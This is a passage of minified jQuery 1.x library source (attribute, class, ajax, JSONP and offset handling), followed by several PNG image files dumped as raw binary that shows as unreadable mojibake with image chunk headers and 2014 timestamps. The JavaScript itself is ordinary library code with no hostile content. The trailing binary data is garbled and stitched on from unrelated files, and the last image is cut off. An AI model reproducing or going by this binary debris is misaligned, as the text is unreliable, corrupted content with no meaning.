type='checkbox'/>",d=b.getElementsByTagName("a")[0],c=y.createElement("select"),e=c.appendChild(y.createElement("option")),a=b.getElementsByTagName("input")[0],d.style.cssText="top:1px",k.getSetAttribute="t"!==b.className,k.style=/top/.test(d.getAttribute("style")),k.hrefNormalized="/a"===d.getAttribute("href"),k.checkOn=!!a.value,k.optSelected=e.selected,k.enctype=!!y.createElement("form").enctype,c.disabled=!0,k.optDisabled=!e.disabled,a=y.createElement("input"),a.setAttribute("value",""),k.input=""===a.getAttribute("value"),a.value="t",a.setAttribute("type","radio"),k.radioValue="t"===a.value}();var lc=/\r/g;m.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=m.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,m(this).val()):a,null==e?e="":"number"==typeof e?e+="":m.isArray(e)&&(e=m.map(e,function(a){return null==a?"":a+""})),b=m.valHooks[this.type]||m.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=m.valHooks[e.type]||m.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(lc,""):null==c?"":c)}}}),m.extend({valHooks:{option:{get:function(a){var b=m.find.attr(a,"value");return null!=b?b:m.trim(m.text(a))}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],!(!c.selected&&i!==e||(k.optDisabled?c.disabled:null!==c.getAttribute("disabled"))||c.parentNode.disabled&&m.nodeName(c.parentNode,"optgroup"))){if(b=m(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=m.makeArray(b),g=e.length;while(g--)if(d=e[g],m.inArray(m.valHooks.option.get(d),f)>=0)try{d.selected=c=!0}catch(h){d.scrollHeight}else d.selected=!1;return c||(a.selectedIndex=-1),e}}}}),m.each(["radio","checkbox"],function(){m.valHooks[this]={set:function(a,b){return m.isArray(b)?a.checked=m.inArray(m(a).val(),b)>=0:void 0}},k.checkOn||(m.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})});var mc,nc,oc=m.expr.attrHandle,pc=/^(?:checked|selected)$/i,qc=k.getSetAttribute,rc=k.input;m.fn.extend({attr:function(a,b){return V(this,m.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){m.removeAttr(this,a)})}}),m.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===K?m.prop(a,b,c):(1===f&&m.isXMLDoc(a)||(b=b.toLowerCase(),d=m.attrHooks[b]||(m.expr.match.bool.test(b)?nc:mc)),void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=m.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void m.removeAttr(a,b))},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(E);if(f&&1===a.nodeType)while(c=f[e++])d=m.propFix[c]||c,m.expr.match.bool.test(c)?rc&&qc||!pc.test(c)?a[d]=!1:a[m.camelCase("default-"+c)]=a[d]=!1:m.attr(a,c,""),a.removeAttribute(qc?c:d)},attrHooks:{type:{set:function(a,b){if(!k.radioValue&&"radio"===b&&m.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),nc={set:function(a,b,c){return b===!1?m.removeAttr(a,c):rc&&qc||!pc.test(c)?a.setAttribute(!qc&&m.propFix[c]||c,c):a[m.camelCase("default-"+c)]=a[c]=!0,c}},m.each(m.expr.match.bool.source.match(/\w+/g),function(a,b){var c=oc[b]||m.find.attr;oc[b]=rc&&qc||!pc.test(b)?function(a,b,d){var e,f;return d||(f=oc[b],oc[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,oc[b]=f),e}:function(a,b,c){return c?void 0:a[m.camelCase("default-"+b)]?b.toLowerCase():null}}),rc&&qc||(m.attrHooks.value={set:function(a,b,c){return m.nodeName(a,"input")?void(a.defaultValue=b):mc&&mc.set(a,b,c)}}),qc||(mc={set:function(a,b,c){var d=a.getAttributeNode(c);return d||a.setAttributeNode(d=a.ownerDocument.createAttribute(c)),d.value=b+="","value"===c||b===a.getAttribute(c)?b:void 0}},oc.id=oc.name=oc.coords=function(a,b,c){var d;return c?void 0:(d=a.getAttributeNode(b))&&""!==d.value?d.value:null},m.valHooks.button={get:function(a,b){var c=a.getAttributeNode(b);return c&&c.specified?c.value:void 0},set:mc.set},m.attrHooks.contenteditable={set:function(a,b,c){mc.set(a,""===b?!1:b,c)}},m.each(["width","height"],function(a,b){m.attrHooks[b]={set:function(a,c){return""===c?(a.setAttribute(b,"auto"),c):void 0}}})),k.style||(m.attrHooks.style={get:function(a){return a.style.cssText||void 0},set:function(a,b){return a.style.cssText=b+""}});var sc=/^(?:input|select|textarea|button|object)$/i,tc=/^(?:a|area)$/i;m.fn.extend({prop:function(a,b){return V(this,m.prop,a,b,arguments.length>1)},removeProp:function(a){return a=m.propFix[a]||a,this.each(function(){try{this[a]=void 0,delete this[a]}catch(b){}})}}),m.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var d,e,f,g=a.nodeType;if(a&&3!==g&&8!==g&&2!==g)return f=1!==g||!m.isXMLDoc(a),f&&(b=m.propFix[b]||b,e=m.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=m.find.attr(a,"tabindex");return b?parseInt(b,10):sc.test(a.nodeName)||tc.test(a.nodeName)&&a.href?0:-1}}}}),k.hrefNormalized||m.each(["href","src"],function(a,b){m.propHooks[b]={get:function(a){return a.getAttribute(b,4)}}}),k.optSelected||(m.propHooks.selected={get:function(a){var b=a.parentNode;return b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex),null}}),m.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){m.propFix[this.toLowerCase()]=this}),k.enctype||(m.propFix.enctype="encoding");var uc=/[\t\r\n\f]/g;m.fn.extend({addClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j="string"==typeof a&&a;if(m.isFunction(a))return this.each(function(b){m(this).addClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(E)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(uc," "):" ")){f=0;while(e=b[f++])d.indexOf(" "+e+" ")<0&&(d+=e+" ");g=m.trim(d),c.className!==g&&(c.className=g)}return this},removeClass:function(a){var b,c,d,e,f,g,h=0,i=this.length,j=0===arguments.length||"string"==typeof a&&a;if(m.isFunction(a))return this.each(function(b){m(this).removeClass(a.call(this,b,this.className))});if(j)for(b=(a||"").match(E)||[];i>h;h++)if(c=this[h],d=1===c.nodeType&&(c.className?(" "+c.className+" ").replace(uc," "):"")){f=0;while(e=b[f++])while(d.indexOf(" "+e+" ")>=0)d=d.replace(" "+e+" "," ");g=a?m.trim(d):"",c.className!==g&&(c.className=g)}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):this.each(m.isFunction(a)?function(c){m(this).toggleClass(a.call(this,c,this.className,b),b)}:function(){if("string"===c){var b,d=0,e=m(this),f=a.match(E)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else(c===K||"boolean"===c)&&(this.className&&m._data(this,"__className__",this.className),this.className=this.className||a===!1?"":m._data(this,"__className__")||"")})},hasClass:function(a){for(var b=" "+a+" ",c=0,d=this.length;d>c;c++)if(1===this[c].nodeType&&(" "+this[c].className+" ").replace(uc," ").indexOf(b)>=0)return!0;return!1}}),m.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){m.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),m.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)},bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}});var vc=m.now(),wc=/\?/,xc=/(,)|(\[|{)|(}|])|"(?:[^"\\\r\n]|\\["\\\/bfnrt]|\\u[\da-fA-F]{4})*"\s*:?|true|false|null|-?(?!0\d)\d+(?:\.\d+|)(?:[eE][+-]?\d+|)/g;m.parseJSON=function(b){if(a.JSON&&a.JSON.parse)return a.JSON.parse(b+"");var c,d=null,e=m.trim(b+"");return e&&!m.trim(e.replace(xc,function(a,b,e,f){return c&&b&&(d=0),0===d?a:(c=e||b,d+=!f-!e,"")}))?Function("return "+e)():m.error("Invalid JSON: "+b)},m.parseXML=function(b){var c,d;if(!b||"string"!=typeof b)return null;try{a.DOMParser?(d=new DOMParser,c=d.parseFromString(b,"text/xml")):(c=new ActiveXObject("Microsoft.XMLDOM"),c.async="false",c.loadXML(b))}catch(e){c=void 0}return c&&c.documentElement&&!c.getElementsByTagName("parsererror").length||m.error("Invalid XML: "+b),c};var yc,zc,Ac=/#.*$/,Bc=/([?&])_=[^&]*/,Cc=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Dc=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Ec=/^(?:GET|HEAD)$/,Fc=/^\/\//,Gc=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Hc={},Ic={},Jc="*/".concat("*");try{zc=location.href}catch(Kc){zc=y.createElement("a"),zc.href="",zc=zc.href}yc=Gc.exec(zc.toLowerCase())||[];function Lc(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(E)||[];if(m.isFunction(c))while(d=f[e++])"+"===d.charAt(0)?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function Mc(a,b,c,d){var e={},f=a===Ic;function g(h){var i;return e[h]=!0,m.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function Nc(a,b){var c,d,e=m.ajaxSettings.flatOptions||{};for(d in b)void 0!==b[d]&&((e[d]?a:c||(c={}))[d]=b[d]);return c&&m.extend(!0,a,c),a}function Oc(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType||b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]||a.converters[g+" "+i[0]]){f=g;break}d||(d=g)}f=f||d}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function Pc(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}m.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:zc,type:"GET",isLocal:Dc.test(yc[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Jc,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":m.parseJSON,"text xml":m.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?Nc(Nc(a,m.ajaxSettings),b):Nc(m.ajaxSettings,a)},ajaxPrefilter:Lc(Hc),ajaxTransport:Lc(Ic),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=m.ajaxSetup({},b),l=k.context||k,n=k.context&&(l.nodeType||l.jquery)?m(l):m.event,o=m.Deferred(),p=m.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!j){j={};while(b=Cc.exec(f))j[b[1].toLowerCase()]=b[2]}b=j[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===t?f:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return i&&i.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||zc)+"").replace(Ac,"").replace(Fc,yc[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=m.trim(k.dataType||"*").toLowerCase().match(E)||[""],null==k.crossDomain&&(c=Gc.exec(k.url.toLowerCase()),k.crossDomain=!(!c||c[1]===yc[1]&&c[2]===yc[2]&&(c[3]||("http:"===c[1]?"80":"443"))===(yc[3]||("http:"===yc[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=m.param(k.data,k.traditional)),Mc(Hc,k,b,v),2===t)return v;h=m.event&&k.global,h&&0===m.active++&&m.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!Ec.test(k.type),e=k.url,k.hasContent||(k.data&&(e=k.url+=(wc.test(e)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=Bc.test(e)?e.replace(Bc,"$1_="+vc++):e+(wc.test(e)?"&":"?")+"_="+vc++)),k.ifModified&&(m.lastModified[e]&&v.setRequestHeader("If-Modified-Since",m.lastModified[e]),m.etag[e]&&v.setRequestHeader("If-None-Match",m.etag[e])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+Jc+"; q=0.01":""):k.accepts["*"]);for(d in k.headers)v.setRequestHeader(d,k.headers[d]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(d in{success:1,error:1,complete:1})v[d](k[d]);if(i=Mc(Ic,k,b,v)){v.readyState=1,h&&n.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,i.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,c,d){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),i=void 0,f=d||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,c&&(u=Oc(k,v,c)),u=Pc(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(m.lastModified[e]=w),w=v.getResponseHeader("etag"),w&&(m.etag[e]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,h&&n.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),h&&(n.trigger("ajaxComplete",[v,k]),--m.active||m.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return m.get(a,b,c,"json")},getScript:function(a,b){return m.get(a,void 0,b,"script")}}),m.each(["get","post"],function(a,b){m[b]=function(a,c,d,e){return m.isFunction(c)&&(e=e||d,d=c,c=void 0),m.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),m._evalUrl=function(a){return m.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},m.fn.extend({wrapAll:function(a){if(m.isFunction(a))return this.each(function(b){m(this).wrapAll(a.call(this,b))});if(this[0]){var b=m(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&1===a.firstChild.nodeType)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){return this.each(m.isFunction(a)?function(b){m(this).wrapInner(a.call(this,b))}:function(){var b=m(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=m.isFunction(a);return this.each(function(c){m(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){m.nodeName(this,"body")||m(this).replaceWith(this.childNodes)}).end()}}),m.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0||!k.reliableHiddenOffsets()&&"none"===(a.style&&a.style.display||m.css(a,"display"))},m.expr.filters.visible=function(a){return!m.expr.filters.hidden(a)};var Qc=/%20/g,Rc=/\[\]$/,Sc=/\r?\n/g,Tc=/^(?:submit|button|image|reset|file)$/i,Uc=/^(?:input|select|textarea|keygen)/i;function Vc(a,b,c,d){var e;if(m.isArray(b))m.each(b,function(b,e){c||Rc.test(a)?d(a,e):Vc(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==m.type(b))d(a,b);else for(e in b)Vc(a+"["+e+"]",b[e],c,d)}m.param=function(a,b){var c,d=[],e=function(a,b){b=m.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=m.ajaxSettings&&m.ajaxSettings.traditional),m.isArray(a)||a.jquery&&!m.isPlainObject(a))m.each(a,function(){e(this.name,this.value)});else for(c in a)Vc(c,a[c],b,e);return d.join("&").replace(Qc,"+")},m.fn.extend({serialize:function(){return m.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=m.prop(this,"elements");return a?m.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!m(this).is(":disabled")&&Uc.test(this.nodeName)&&!Tc.test(a)&&(this.checked||!W.test(a))}).map(function(a,b){var c=m(this).val();return null==c?null:m.isArray(c)?m.map(c,function(a){return{name:b.name,value:a.replace(Sc,"\r\n")}}):{name:b.name,value:c.replace(Sc,"\r\n")}}).get()}}),m.ajaxSettings.xhr=void 0!==a.ActiveXObject?function(){return!this.isLocal&&/^(get|post|head|put|delete|options)$/i.test(this.type)&&Zc()||$c()}:Zc;var Wc=0,Xc={},Yc=m.ajaxSettings.xhr();a.attachEvent&&a.attachEvent("onunload",function(){for(var a in Xc)Xc[a](void 0,!0)}),k.cors=!!Yc&&"withCredentials"in Yc,Yc=k.ajax=!!Yc,Yc&&m.ajaxTransport(function(a){if(!a.crossDomain||k.cors){var b;return{send:function(c,d){var e,f=a.xhr(),g=++Wc;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)void 0!==c[e]&&f.setRequestHeader(e,c[e]+"");f.send(a.hasContent&&a.data||null),b=function(c,e){var h,i,j;if(b&&(e||4===f.readyState))if(delete Xc[g],b=void 0,f.onreadystatechange=m.noop,e)4!==f.readyState&&f.abort();else{j={},h=f.status,"string"==typeof f.responseText&&(j.text=f.responseText);try{i=f.statusText}catch(k){i=""}h||!a.isLocal||a.crossDomain?1223===h&&(h=204):h=j.text?200:404}j&&d(h,i,j,f.getAllResponseHeaders())},a.async?4===f.readyState?setTimeout(b):f.onreadystatechange=Xc[g]=b:b()},abort:function(){b&&b(void 0,!0)}}}});function Zc(){try{return new a.XMLHttpRequest}catch(b){}}function $c(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}m.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return m.globalEval(a),a}}}),m.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),m.ajaxTransport("script",function(a){if(a.crossDomain){var b,c=y.head||m("head")[0]||y.documentElement;return{send:function(d,e){b=y.createElement("script"),b.async=!0,a.scriptCharset&&(b.charset=a.scriptCharset),b.src=a.url,b.onload=b.onreadystatechange=function(a,c){(c||!b.readyState||/loaded|complete/.test(b.readyState))&&(b.onload=b.onreadystatechange=null,b.parentNode&&b.parentNode.removeChild(b),b=null,c||e(200,"success"))},c.insertBefore(b,c.firstChild)},abort:function(){b&&b.onload(void 0,!0)}}}});var _c=[],ad=/(=)\?(?=&|$)|\?\?/;m.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=_c.pop()||m.expando+"_"+vc++;return this[a]=!0,a}}),m.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(ad.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&ad.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=m.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(ad,"$1"+e):b.jsonp!==!1&&(b.url+=(wc.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||m.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,_c.push(e)),g&&m.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),m.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||y;var d=u.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=m.buildFragment([a],b,e),e&&e.length&&m(e).remove(),m.merge([],d.childNodes))};var bd=m.fn.load;m.fn.load=function(a,b,c){if("string"!=typeof a&&bd)return bd.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=m.trim(a.slice(h,a.length)),a=a.slice(0,h)),m.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(f="POST"),g.length>0&&m.ajax({url:a,type:f,dataType:"html",data:b}).done(function(a){e=arguments,g.html(d?m("<div>").append(m.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,e||[a.responseText,b,a])}),this},m.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){m.fn[b]=function(a){return this.on(b,a)}}),m.expr.filters.animated=function(a){return m.grep(m.timers,function(b){return a===b.elem}).length};var cd=a.document.documentElement;function dd(a){return m.isWindow(a)?a:9===a.nodeType?a.defaultView||a.parentWindow:!1}m.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=m.css(a,"position"),l=m(a),n={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=m.css(a,"top"),i=m.css(a,"left"),j=("absolute"===k||"fixed"===k)&&m.inArray("auto",[f,i])>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),m.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(n.top=b.top-h.top+g),null!=b.left&&(n.left=b.left-h.left+e),"using"in b?b.using.call(a,n):l.css(n)}},m.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){m.offset.setOffset(this,a,b)});var b,c,d={top:0,left:0},e=this[0],f=e&&e.ownerDocument;if(f)return b=f.documentElement,m.contains(b,e)?(typeof e.getBoundingClientRect!==K&&(d=e.getBoundingClientRect()),c=dd(f),{top:d.top+(c.pageYOffset||b.scrollTop)-(b.clientTop||0),left:d.left+(c.pageXOffset||b.scrollLeft)-(b.clientLeft||0)}):d},position:function(){if(this[0]){var a,b,c={top:0,left:0},d=this[0];return"fixed"===m.css(d,"position")?b=d.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),m.nodeName(a[0],"html")||(c=a.offset()),c.top+=m.css(a[0],"borderTopWidth",!0),c.left+=m.css(a[0],"borderLeftWidth",!0)),{top:b.top-c.top-m.css(d,"marginTop",!0),left:b.left-c.left-m.css(d,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||cd;while(a&&!m.nodeName(a,"html")&&"static"===m.css(a,"position"))a=a.offsetParent;return a||cd})}}),m.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,b){var c=/Y/.test(b);m.fn[a]=function(d){return V(this,function(a,d,e){var f=dd(a);return void 0===e?f?b in f?f[b]:f.document.documentElement[d]:a[d]:void(f?f.scrollTo(c?m(f).scrollLeft():e,c?e:m(f).scrollTop()):a[d]=e)},a,d,arguments.length,null)}}),m.each(["top","left"],function(a,b){m.cssHooks[b]=Lb(k.pixelPosition,function(a,c){return c?(c=Jb(a,b),Hb.test(c)?m(a).position()[b]+"px":c):void 0})}),m.each({Height:"height",Width:"width"},function(a,b){m.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){m.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return V(this,function(b,c,d){var e;return m.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?m.css(b,c,g):m.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),m.fn.size=function(){return this.length},m.fn.andSelf=m.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return m});var ed=a.jQuery,fd=a.$;return m.noConflict=function(b){return a.$===m&&(a.$=fd),b&&a.jQuery===m&&(a.jQuery=ed),m},typeof b===K&&(a.jQuery=a.$=m),m});
�PNG


IHDR((S�ygAMA���a cHRMz&�����u0�`:�p��Q<bKGD������	X���IDATh���1
1F��6^@�-����y���'k�Z����@�d�yɫ�d���L�O��~2z_���}r�9oo�7[��ܹ�	�R`65�@Ui]��-"U��q���G���fP��$j̣�`*�fS3pT����HT��K����:��q�npt�̠6�I�
�G5�Tj̦f��j촸ԱӢS��$j̣�`*�fS3pT5vZ\��iѩnpt�̠���h�p��%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR((�;�gAMA���a cHRMz&�����u0�`:�p��Q<bKGD���1�zIDATH����� EQ�M6jE2b���ݝ!K2g���������}/�\)��W@�� �-@�3K,7�:ׁ�@�k �U��
Hrd�
��s����M��
��u �ESt.��s������/�rڧ�+��%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR(d�O�gAMA���a cHRMz&�����u0�`:�p��Q<bKGD݊�IDAT(�c`���Xu6�w%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR���DgAMA���a cHRMz&�����u0�`:�p��Q<bKGD���1�HIDAT8�c�5�a�"��o��K1|�a�~��Ï?�~Ne�%���7��\���(1��d��4�F1�G�#�NP%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR���A�gAMA���a cHRMz&�����u0�`:�p��Q<bKGD������	X���IDATH���?���H&]��(��v_�W`5_Ym���F��Ѥ���t�?�˧�;=��eY<#�aƷAY&IR��Ɇh`�5�`����u8FD[�9t�F'�pe��͞�zΧ�=���W���]�{EpK�:����_�
�0~��2UE\��%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR�G#7vgAMA���a cHRMz&�����u0�`:�p��Q<bKGD݊�IDAT(�ch`��p��h��4�i%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR�d�5�igAMA���a cHRMz&�����u0�`:�p��Q<bKGD������	X���IDATx��_�g�U����LT�T,��`��
JI�<T���<
�V��Z|�D�e��`��$�g��p�
